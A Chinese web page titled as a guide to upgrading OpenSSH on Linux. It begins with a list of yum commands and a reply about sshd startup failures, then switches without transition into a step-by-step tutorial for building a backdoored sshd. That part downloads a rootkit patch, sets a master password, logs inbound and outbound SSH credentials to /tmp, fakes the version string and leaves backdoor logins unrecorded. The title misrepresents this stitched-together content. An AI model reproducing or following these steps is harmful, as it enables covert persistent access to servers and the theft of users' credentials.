Linux系统下怎么升级OpenSSH

Linux系统下怎么升级OpenSSH,第1张

命令作用

yum repolist all列出所有仓库。

yum list all列出仓库中所有软件包

yum info 软件包名称查看软件包信息

yum install 软件包名称安装软件包

yum reinstall 软件包名称重新安装软件包

yum update 软件包名称升级软件包

yum remove 软件包移除软件包

yum clean all清除所有仓库缓存

yum check-update检查可更新的软件包

yum grouplist查看系统中已经安装的软件包组

yum groupinstall 软件包组安装指定的软件包组

yum groupremove软件包组移除指定的软件包组

yum groupinfo 软件包组查询指定的软件包组信息

请参考《linux就该这么学》,第1章 部署虚拟环境安装linux系统,查看软件升级命令。

首先,我想知道你是怎么升级的,例如你是用rpm包直接升级的,还是自己编译新的版本,然后将新版本的路径添加到系统路径里。根据你图片上的内容只显示sshd服务启动失败,但是不知道你的升级方式,可能只是系统自带的sshd启动失败,但是你新版本的启动成功。所以才会出现你说的那种情况,可以在后台看到sshd进程。如果是rpm升级,应该不会出现这种情况。

如果你是自己编译安装的,那么你就需要修改sshd的service文件,将里面的命令启动路径改到你编译安装以后的openssh8.0的命令路径,这样才能使用systemctl命令来启动新版本的软件。

希望可以帮到你

特别提示:仅用于安全测试和教学,禁止非法用途。

标题党了,呵呵

其实就是个ssh后门,基本可以不用看内核版本,很简单,为照顾新手!

*************************************************************************

地址在这http://core.ipsecs.com/rootkit/patch-to-hack/(已被墙)

我以 openssh 5.9centos 5.6 做演示

在这里找到对应的openssh版本 http://openbsd.org.ar/pub/OpenBSD/OpenSSH/portable/

安装前首先

ssh -V

记录下原来ssh版本信息,免得安装后一看就版本不一样了

wget http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz

wget http://openbsd.org.ar/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz

tar zxvf openssh-5.9p1.tar.gz

tar zxvf 0x06-openssh-5.9p1.patch.tar.gz

cd openssh-5.9p1.patch/

cp sshbd5.9p1.diff ../openssh-5.9p1

cd ../openssh-5.9p1

patch <sshbd5.9p1.diff //patch 后门

vi includes.h //修改后门密码,记录文件位置,

/*

+#define ILOG "/tmp/ilog" //记录登录到本机的用户名和密码

+#define OLOG "/tmp/olog" //记录本机登录到远程的用户名和密码

+#define SECRETPW "123456654321"//你后门的密码

*/

vi version.h //修改ssh版本信息,改成原来的

先安装所需环境不然会报错

yum install -y openssl openssl-devel pam-devel

./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5

注意要是出现:configure: error: *** zlib.h missing – please install first or check config.log

需要安装zlib

yum install -y zlib zlib-devel// http://sourceforge.net/projects/libpng/files/zlib/1.2.3/zlib-1.2.3.tar.gz/download 需要 make clean

make &&make install

service sshd restart //重启sshd

然后我们登录ssh看看

再ssh localhost看看

使用后门密码登录是不会被记录的

后门,记录一举两得,是不是很简单


欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/yw/7535717.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-04-06
下一篇 2023-04-06

发表评论

登录后才能评论

评论列表(0条)

保存